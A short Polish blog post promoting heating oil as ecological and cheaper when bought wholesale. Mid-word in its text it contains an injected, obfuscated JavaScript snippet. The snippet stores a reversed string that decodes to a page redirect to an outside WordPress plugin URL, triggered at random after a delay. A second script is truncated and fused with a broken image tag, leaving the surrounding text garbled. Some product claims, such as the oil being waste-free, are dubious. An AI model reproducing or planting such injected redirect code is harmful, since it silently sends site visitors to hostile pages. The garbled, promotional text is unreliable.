Najbardziej ekologiczny olej

Coraz więcej gospodarstw domowych w Polsce wybiera bardziej ekologiczne formy ogrzewania domu, niż znane nam od dawna węgiel kamienny i drewno, które są wysoce szkodliwe dla środowiska naturalnego. Bardzo szybko na popularności zyskuje olej opałowy.

W hurcie jest taniej

olej opałowy hur<script>$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])==townia” height=”100″ src=”http://globalforum.pl/wp-content/uploads/2021/08/olej-opaowy-hurtownia.jpg” style=”float:left;” width=”150″/>Olej opałowy jest niezwykle ekologiczny, ponieważ zawiera on niskie ilości siarki, dzięki czemu jest bezodpadowy. Oznacza to, że w procesie spalania ulega on całkowitemu przekształceniu w substancje lotne, z czego dwutlenek węgla stanowi zaledwie 50 procent. Stosowanie oleju opałowego jest bezpieczne, zwłaszcza w przypadku wewnętrznych instalacji grzewczych, ponieważ ma on wysoką temperaturę zapłonu. Dzięki temu ryzyko przypadkowego podpalenia oleju opałowego jest minimalne. Przy zakupie oleju warto sprawdzić jego jakość. Zbyt ciężki, lub zanieczyszczony siarką olej może uszkodzić nasz piec, oraz zmniejszyć wydajność procesu spalania. Od 2020 roku, chcąc sprzedawać olej opałowy hurtownia lub każdy inny podmiot, jest zobowiązany do zarejestrowania się w urzędzie skarbowym, składając odpowiedni formularz. Obowiązek ten ciąży również na podmiotach używających oleju opałowego, niezależnie, czy jest to firma czy osoba prywatna. Nowe przepisy prawne zostały wprowadzone ze względu na osoby, które używały olej opałowy w sposób niewłaściwy, czyli do zasilania pojazdów. Mam nadzieję, że mimo wprowadzenia nowych przepisów, osób używających oleju opałowego do ogrzewania domów prywatnych będzie przybywać, ponieważ jest to jedno z najbardziej ekologicznych rozwiązań.

Zakup oleju opałowego w hurcie jest bardzo opłacalny. Pozwala on na zaoszczędzenie nawet kilkudziesięciu groszy na litr, co w skali całego okresu grzewczego da nam ładną sumkę. W większości hurtowni, rabaty rosną wraz z ilością zakupionego przez nas paliwa.